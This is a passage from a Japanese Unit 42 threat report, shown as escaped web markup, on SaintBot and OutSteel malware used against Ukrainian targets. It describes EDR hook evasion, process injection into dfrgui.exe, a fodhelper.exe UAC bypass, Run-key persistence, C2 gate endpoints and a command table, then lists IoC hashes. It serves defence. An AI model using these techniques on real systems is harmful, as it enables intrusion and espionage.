monospace;\">ntdll.dll<\/span>\u306e\u63d0\u4f9b\u3059\u308b\u4e3b\u8981\u306aAPI\u306e\u30ed\u30fc\u30c9\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u51e6\u7406\u306f\u3001EDR\u3084\u30a2\u30f3\u30c1\u30a6\u30a4\u30eb\u30b9\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u304c\u5143\u306e<span style=\"font-family: 'courier new', courier, monospace;\">ntdll.dll<\/span>\u5185\u306eAPI\u547c\u3073\u51fa\u3057\u306b\u30d5\u30c3\u30af\u3092\u8a2d\u5b9a\u3057\u3066\u3044\u308b\u5834\u5408\u3001\u305d\u306e\u30d5\u30c3\u30af\u3092\u907f\u3051\u308b\u305f\u3081\u306b\u884c\u308f\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122107\" aria-describedby=\"caption-attachment-122107\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122108 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-40.png\" alt=\"slideshow.mp4\u7d4c\u7531\u3067API\u3092\u89e3\u6c7a\" width=\"900\" height=\"300\" \/><figcaption id=\"caption-attachment-122107\" class=\"wp-caption-text\">\u56f317. slideshow.mp4\u7d4c\u7531\u3067API\u3092\u89e3\u6c7a<\/figcaption><\/figure>\n<p>\u3053\u306e\u6642\u70b9\u3067\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6b21\u306b\u81ea\u8eab\u304c<span style=\"font-family: 'courier new', courier, monospace;\">dfrgui.exe<\/span>\u3068\u3044\u3046\u30d7\u30ed\u30bb\u30b9\u540d\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u305d\u306e\u540d\u524d\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u306a\u3051\u308c\u3070\u3001<span style=\"font-family: 'courier new', courier, monospace;\">%SYSTEM%<\/span>\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304b\u3089<span style=\"font-family: 'courier new', courier, monospace;\">dfrgui.exe<\/span>\u3092\u751f\u6210\u3057\u307e\u3059\u3002\u751f\u6210\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u306f\u3001<span style=\"font-family: 'courier new', courier, monospace;\">NtQueueApcThread\u3092<\/span>\u4f7f\u7528\u3057\u3066<span style=\"font-family: 'courier new', courier, monospace;\">dfrgui.exe\u306b<\/span>\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3055\u308c\u3066\u30d7\u30ed\u30bb\u30b9\u3092\u518d\u958b\u3057\u3001\u5143\u306eMSBuild\u30d7\u30ed\u30bb\u30b9\u306f\u7d42\u4e86\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122110\" aria-describedby=\"caption-attachment-122110\" style=\"width: 2048px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122110 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-41.png\" alt=\"\u56f318. dfrgui.exe\u3078\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\" width=\"2048\" height=\"255\" \/><figcaption id=\"caption-attachment-122110\" class=\"wp-caption-text\">\u56f318. dfrgui.exe\u3078\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3<\/figcaption><\/figure>\n<p>SaintBot\u306f<span style=\"font-family: 'courier new', courier, monospace;\">dfrgui.exe<\/span>\u5185\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u3068\u304d\u3001\u81ea\u8eab\u304c\u7ba1\u7406\u8005\u6a29\u9650\u3067\u52d5\u4f5c\u3057\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u7ba1\u7406\u8005\u6a29\u9650\u3067\u52d5\u4f5c\u3057\u3066\u3044\u306a\u3044\u5834\u5408\u306f<span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/gist.github.com\/netbiosX\/a114f8822eb20b115e33db55deee6692\">fodhelper.exe<\/a><\/span>\u3092\u4f7f\u3063\u3066UAC\u3092\u30d0\u30a4\u30d1\u30b9\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122111\" aria-describedby=\"caption-attachment-122111\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122112 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-42.png\" alt=\"fodhelper.exe\u7d4c\u7531\u306e\u7279\u6a29\u6607\u683c\" width=\"900\" height=\"520\" \/><figcaption id=\"caption-attachment-122111\" class=\"wp-caption-text\">\u56f319. fodhelper.exe\u7d4c\u7531\u306e\u7279\u6a29\u6607\u683c<\/figcaption><\/figure>\n<p>\u305d\u306e\u5f8c\u3001\u30ec\u30b8\u30b9\u30c8\u30ea\u30ad\u30fc<span style=\"font-family: 'courier new', courier, monospace;\">CurrentVersion\\Run<\/span>\u3067\u6c38\u7d9a\u5316\u306e\u8a2d\u5b9a\u304c\u884c\u308f\u308c\u3001\u3088\u3046\u3084\u304fC2\u30b5\u30fc\u30d0\u3068\u306e\u901a\u4fe1\u304c\u958b\u59cb\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u5408\u8a083\u3064\u306eC2\u30b5\u30fc\u30d0\u30fc\u304c\u7d44\u307f\u8fbc\u307e\u308c\u3066\u304a\u308a\u3001\u3059\u3079\u3066\u540c\u3058<span style=\"font-family: 'courier new', courier, monospace;\">\/wp-adm\/gate.php<\/span>\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u306b\u63a5\u7d9a\u3057\u306b\u3044\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122113\" aria-describedby=\"caption-attachment-122113\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122114 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-43.png\" alt=\"\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305fC2\" width=\"900\" height=\"494\" \/><figcaption id=\"caption-attachment-122113\" class=\"wp-caption-text\">\u56f320. \u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305fC2<\/figcaption><\/figure>\n<p>\u3053\u306e\u7279\u5b9a\u30b5\u30f3\u30d7\u30eb\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u5408\u8a086\u3064\u306e\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u3051\u4ed8\u3051\u307e\u3059\u3002<\/p>\n<table style=\"width: 99.78%;\">\n<tbody>\n<tr>\n<td style=\"width: 18.8474%;\"><b>\u30b3\u30de\u30f3\u30c9<\/b><\/td>\n<td style=\"width: 197.975%;\"><b>\u76ee\u7684<\/b><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 18.8474%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">de<\/span><\/p>\n<p><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">de:regsvr32<\/span><\/td>\n<td style=\"width: 197.975%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>\u7d4c\u7531\u3067EXE\u3084DLL\u3092(regsvr32\u3092\u4f7f\u3063\u3066)\u5b9f\u884c\u3059\u308b<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 18.8474%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">de:LoadMemory<\/span><\/td>\n<td style=\"width: 197.975%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">dfrgui.exe<\/span>\u306e\u30b3\u30d4\u30fc\u3092\u751f\u6210\u3057\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u30d7\u30ed\u30bb\u30b9\u306b\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3059\u308b<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 18.8474%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">de:LL<\/span><\/td>\n<td style=\"width: 197.975%;\">DLL\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057<span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">LdrLoadDll()<\/span>\u3067\u30e1\u30e2\u30ea\u306b\u30ed\u30fc\u30c9\u3059\u308b<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 18.8474%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">update<\/span><\/td>\n<td style=\"width: 197.975%;\"><span style=\"font-weight: 400;\">SaintBot\u306e\u30d0\u30a4\u30ca\u30ea\u3092\u66f4\u65b0\u3059\u308b<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 18.8474%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">uninstall<\/span><\/td>\n<td style=\"width: 197.975%;\"><span style=\"font-weight: 400;\">\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u304b\u3089SaintBot\u3092\u30a2\u30f3\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"color: #999999;\"><sup>\u88683 SaintBot\u306e\u30b3\u30de\u30f3\u30c9<\/sup><\/span><\/p>\n<h1><a id=\"conclusion\"><\/a>\u7d50\u8ad6<\/h1>\n<p>Unit 42\u306e\u8abf\u67fb\u306b\u3088\u308a\u3001\u3042\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u91cd\u8981\u30a4\u30f3\u30d5\u30e9\u306e\u4e00\u90e8\u3067\u3042\u308b\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u4eca\u56de\u306e\u653b\u6483\u306f\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u653f\u5e9c\u6a5f\u95a2\u3060\u3051\u3067\u306a\u304f\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u5185\u306e\u5916\u56fd\u5927\u4f7f\u9928\u3092\u6a19\u7684\u3068\u3057\u305f1\u5e74\u306b\u308f\u305f\u308b\u653b\u6483\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u306e\u4e00\u74b0\u3067\u3059\u3002\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u6587\u66f8\u3001\u30a2\u30fc\u30ab\u30a4\u30d6\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30d5\u30a1\u30a4\u30eb\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u95a2\u9023\u30c7\u30fc\u30bf\u3092\u542b\u3080\u30d5\u30a1\u30a4\u30eb\u306a\u3069\u3001\u3055\u307e\u3056\u307e\u306a\u7a2e\u985e\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u81ea\u52d5\u7684\u306b\u6d41\u51fa\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u308bOutSteel\u3068\u3044\u3046\u60aa\u610f\u306e\u3042\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u914d\u5e03\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u6a19\u7684\u306b\u3055\u308c\u305f\u7d44\u7e54\u306e\u4e00\u89a7\u3068\u30d5\u30a1\u30a4\u30eb\u6f0f\u51fa\u7528\u30c4\u30fc\u30eb\u306e\u4f7f\u7528\u304b\u3089\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u4e3b\u306a\u76ee\u6a19\u306f\u72b6\u6cc1\u8a8d\u8b58\u3068\u30a6\u30af\u30e9\u30a4\u30ca\u5bfe\u5fdc\u306b\u6d3b\u7528\u3059\u308b\u76ee\u7684\u3067\u6a5f\u5bc6\u60c5\u5831\u3092\u7a83\u53d6\u3059\u308b\u3053\u3068\u3042\u308b\u3068\u8003\u3048\u3089\u308c\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u88fd\u54c1\u3092\u3054\u5229\u7528\u306e\u304a\u5ba2\u69d8\u306f\u3001\u5f0a\u793e\u306e\u88fd\u54c1\u30fb\u30b5\u30fc\u30d3\u30b9\u306b\u3088\u308a\u672c\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u9023\u3059\u308b\u4ee5\u4e0b\u306e\u5bfe\u7b56\u304c\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><a href=\"https:\/\/www.paloaltonetworks.jp\/cortex\/cortex-xdr\">Cortex XDR\u306f<\/a>\u3001\u672c\u7a3f\u3067\u7d39\u4ecb\u3057\u305fSaintBot\u30de\u30eb\u30a6\u30a7\u30a2\u304b\u3089\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u3092\u4fdd\u8b77\u3057\u307e\u3059\u3002<\/p>\n<p>\u30af\u30e9\u30a6\u30c9\u30d9\u30fc\u30b9\u306e\u8105\u5a01\u5206\u6790\u30b5\u30fc\u30d3\u30b9\u3067\u3042\u308b<a href=\"https:\/\/www.paloaltonetworks.jp\/products\/secure-the-network\/wildfire\">WildFire<\/a>\u306f\u3001\u672c\u7a3f\u3067\u53d6\u308a\u4e0a\u3052\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u60aa\u610f\u306e\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u6b63\u78ba\u306b\u7279\u5b9a\u3057\u307e\u3059\u3002<\/p>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\">Advanced URL Filtering<\/a>\u3068<a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/dns-security\">DNS\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3<\/a>\u306f\u3001\u540c\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u9023\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3092\u60aa\u610f\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u8b58\u5225\u3057\u307e\u3059\u3002<\/p>\n<p>\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u306b\u57fa\u3065\u304f\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30b5\u30fc\u30d3\u30b9<a href=\"https:\/\/www.paloaltonetworks.jp\/cortex\/autofocus\">AutoFocus<\/a>\u3092\u3054\u5229\u7528\u4e2d\u306e\u304a\u5ba2\u69d8\u306f\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.SaintBot\">SaintBot<\/a>\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.SaintBot_Loader\">SaintBot_Loader<\/a>\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.OutSteel\">OutSteel<\/a>\u306e\u5404\u30bf\u30b0\u3092\u4f7f\u3063\u3066\u3053\u308c\u3089\u306e\u653b\u6483\u306b\u95a2\u9023\u3059\u308b\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u8868\u793a\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306f\u30d5\u30a1\u30a4\u30eb\u30b5\u30f3\u30d7\u30eb\u3084\u4fb5\u5bb3\u306e\u5146\u5019\u306a\u3069\u3092\u3075\u304f\u3080\u3053\u308c\u3089\u306e\u8abf\u67fb\u7d50\u679c\u3092Cyber Threat Alliance (CTA \u30b5\u30a4\u30d0\u30fc\u8105\u5a01\u30a2\u30e9\u30a4\u30a2\u30f3\u30b9) \u306e\u30e1\u30f3\u30d0\u30fc\u3068\u5171\u6709\u3057\u307e\u3057\u305f\u3002CTA \u306e\u30e1\u30f3\u30d0\u30fc\u306f\u3053\u306e\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u3092\u4f7f\u7528\u3057\u3066\u3001\u304a\u5ba2\u69d8\u306b\u4fdd\u8b77\u3092\u8fc5\u901f\u306b\u63d0\u4f9b\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u8005\u3092\u4f53\u7cfb\u7684\u306b\u963b\u5bb3\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f <a href=\"https:\/\/www.cyberthreatalliance.org\/\">Cyber Threat Alliance <\/a>\u304b\u3089\u3054\u89a7\u304f\u3060\u3055\u3044\uff61<\/p>\n<h1><a id=\"additional-resources\"><\/a>\u8ffd\u52a0\u30ea\u30bd\u30fc\u30b9<\/h1>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2021\/04\/a-deep-dive-into-saint-bot-downloader\/\">A deep dive into SaintBot, a new downloader<\/a><br \/>\n<a href=\"https:\/\/www.intezer.com\/blog\/malware-analysis\/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia\/\">Targeted Phishing Attack Against Ukrainian Government Expands to Georgia<\/a><br \/>\n<a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/spearphishing-attack-uses-covid-21-lure-to-target-ukrainian-government\">Spearphising Attack Uses COVID 21 Lure to Target Ukrainian Government<\/a><br \/>\n<a href=\"https:\/\/cert.gov.ua\/article\/13156\">CERT-UA Post from July 13, 2021<\/a><br \/>\n<a href=\"https:\/\/cert.gov.ua\/article\/18419\">CERT-UA Post from Feb. 2, 2022<\/a><br \/>\n<a href=\"https:\/\/unit42.paloaltonetworks.jp\/preparing-for-cyber-impact-russia-ukraine-crisis\/\">\u30ed\u30b7\u30a2\u30fb\u30a6\u30af\u30e9\u30a4\u30ca\u5371\u6a5f\u306b\u3068\u3082\u306a\u3046\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u5f71\u97ff\u3078\u5099\u3048\u3092<\/a><br \/>\n<a href=\"https:\/\/register.paloaltonetworks.com\/unit42briefingrussiaukraine\">Russia-Ukraine Crisis Briefings: How to Protect Against the Cyber Impact(\u30ed\u30b7\u30a2\u30fb\u30a6\u30af\u30e9\u30a4\u30ca\u5371\u6a5f\u306e\u30d6\u30ea\u30fc\u30d5\u30a3\u30f3\u30b0: \u3042\u308b\u3079\u304d\u30b5\u30a4\u30d0\u30fc\u30a4\u30f3\u30d1\u30af\u30c8\u304b\u3089\u306e\u4fdd\u8b77\u3068\u306f)<\/a><br \/>\n<a href=\"https:\/\/www.paloaltonetworks.com\/russia-ukraine-cyber-resources\">\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u30ea\u30bd\u30fc\u30b9\u30da\u30fc\u30b8: \u30ed\u30b7\u30a2\u30fb\u30a6\u30af\u30e9\u30a4\u30ca\u5371\u6a5f\u306b\u3088\u308b\u30b5\u30a4\u30d0\u30fc\u30a4\u30f3\u30d1\u30af\u30c8\u304b\u3089\u306e\u4fdd\u8b77<\/a><\/p>\n<h1><a id=\"indicators-of-compromise\"><\/a>IoC<\/h1>\n<h2>\u914d\u5e03\u7269\u306e\u30cf\u30c3\u30b7\u30e5<\/h2>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">07ed980373c344fd37d7bdf294636dff796523721c883d48bb518b2e98774f2c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0be1801a6c5ca473e2563b6b77e76167d88828e1347db4215b7a83e161dae67f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0db336cab2ca69d630d6b7676e5eab86252673b1197b34cf4e3351807229f12a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0f13f5f9a53a78fc4f528e352cd94929ae802873374ffb9ac6a16652bd9ea4c5<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">101d9f3a9e4a8d0c8d80bcd40082e10ab71a7d45a04ab443ef8761dfad246ca5<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1092d367692045995fab78ba1b9b236d5b99d817dd09cba69fd3834e45bd3ddf<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">10d21d4bf93e78a059a32b0210bd7891e349aabe88d0184d162c104b1e8bee2e<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">14bde11c50a2df2401831fea50760dd6cf9a492a3a98753ab3b1c6ce4d079196<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">157b05db61aaf171823c7897a2f931d96a62083a3ad6014cb41c6b42694a0c2f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">172f12c692611e928e4ea42b883b90147888b54a8fb858fc97140b82eef409f3<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">275388ffad3a1046087068a296a6060ed372d5d4ef6cf174f55c3b4ec7e8a0e8<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">276ac9b9fe682d76382ec6e5bc3d1d045ce937438f92949c23453468eb62a143<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2c879f5d97f126820f1fbf575df7e681c90f027062b6bcb3451bb09607c922da<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2ec710d38a0919f9f472b220cfe8d554a30d24bfa4bdd90b96105cee842cf40d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">35180c81ebcefbc32c2442c683cab6fd299af797a0493d38589d5c5d1d6b5313<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">354868cd615a0377e0028bcaee422c29f6b6088b83a0b37a32e00cce5dba43f9<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">434d39bfbcee378ed62a02aa40acc6507aa00b2a3cb0bf356c0b23cc9eebcd77<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">461eeadbe118b5ad64a62f2991a8bd66bdcd3dd1808cd7070871e7cc02effad7<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4fcfe7718ea860ab5c6d19b27811f81683576e7bb60da3db85b4658230414b70<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">52173598ca2f4a023ec193261b0f65f57d9be3cb448cd6e2fcc0c8f3f15eaaf7<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">5227adda2d80fb9b66110eeb26d57e69bbbb7bd681aecc3b1e882dc15e06be17<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">5cda471f91413a31d3bc0e05176c4eb9180dfcac3695b83edd6a5d4b544fe3f1<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">5d8c5bb9858fb51271d344eac586cff3f440c074254f165c23dd87b985b2110b<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">5d9c7192cae28f4b6cc0463efe8f4361e449f87c2ad5e74a6192a0ad96525417<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">5dabf2e0fcc2366d512eda2a37d73f4d6c381aa5cb8e35e9ce7f53dae1065e4a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">63d7b35ca907673634ea66e73d6a38486b0b043f3d511ec2d2209597c7898ae8<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">64057982a5874a9ccdb1b53fc15dd40f298eda2eb38324ac676329f5c81b64e0<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">677500881c64f4789025f46f3d0e853c00f2f41216eb2f2aaa1a6c59884b04cc<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">68313c90ca8eb0d5fc5e63e2b0f7a5f4d1fe15f825fe8ca0b4b3e922a253caa7<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">84e651b2d55a75ec59b861b11a8f8f7cb155ed81604081c95dd11b8aec5b31b1<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">882597c251905f9be31352ba034835764124c9a9e25ef1ba0150e5998c621f07<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">891f526fea4d9490a8899ce895ce86af102a09a50b40507645fee0cf2ab5bef5<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">8bb427b4f80fe1ede3e3ed452d9f0a4ce202b77cda4ad2d54968ab43578e9fa9<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">90ce65b0b91df898de16aa652d7603566748ac32857972f7d568925821764e17<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">92af444e0e9e4e49deda3b7e5724aaecbb7baf888b6399ec15032df31978f4cf<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">96f815abb422bb75117e867384306a3f1b3625e48b81c44ebf032953deb2b3ff<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9803e65afa5b8eef0b6f7ced42ebd15f979889b791b8eadfc98e7f102853451a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">a16e466bed46fcf9c0a771ca0e41bc42a1ac13e66717354e4824f61d1695dbb1<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">a356be890d2f48789b46cd1d393a838be10bdea79f12a10b1adf1d78178343c5<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">a60f4a353ea89adc8def453c8a1e65ea2ecc46c64d0d9ea375ca4e85e1c428fd<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b7c6b82a8074737fb35adccddf63abeca71573fe759bd6937cd36af5658af864<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b89a71c9dbc9492ecb9debb38987ab25a9f1d9c41c6fbc33e67cac055c2664bc<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">c9761f30956f5ba1ac9abc8b000eae8686158d05238d9e156f42dd5c17520296<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">d99f998207c38fe3ab98b0840707227af4d96c1980a5c2f8f9ac7062fab0596d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">dfe11b83da7c4dc02ff7675d086ff7ddd97fec71c62cc96f1a391f574bec6b4f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">e39a12f34bb8a7a5a03fd23f351846088692e1248a3952e488102d3aea577644<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f0d99b7056dac946af19b50e27855b89f00550d3d8dc420a28731814a039d052<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f69125eafdd54e1aae10707e0d95b0526e80b3b224f2b64f5f6d65485ca9e886<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">fbe13003a4e39a5dea3648ee906ea7b86ed121fd3136f15678cf1597d216c58a<\/span><\/p>\n<h2>\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30cf\u30c3\u30b7\u30e5<\/h2>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">005d2d373e7ba5ee42010870b9f9bf829213a42b2dd3c4f3f4405c8b904641f2<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0222f6bdfd21c41650bcb056f618ee9e4724e722b3abcd8731b92a99167c6f8d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0c644fedcb4298b705d24f2dee45dda0ae5dd6322d1607e342bcf1d42b59436c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0e1e2f87699a24d1d7b0d984c3622971028a0cafaf665c791c70215f76c7c8fe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0f7a8611deea696b2b36e44ea652c8979e296b623e841796a4ea4b6916b39e7c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">0fc7154ebd80ea5d81d82e3a4920cb2699a8dd7c31100ca8ec0693a7bd4af8b7<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">137fc4df5f5cad2c88460314e13878264cc90d25f26b105bb057f6bfdca4cbf2<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, 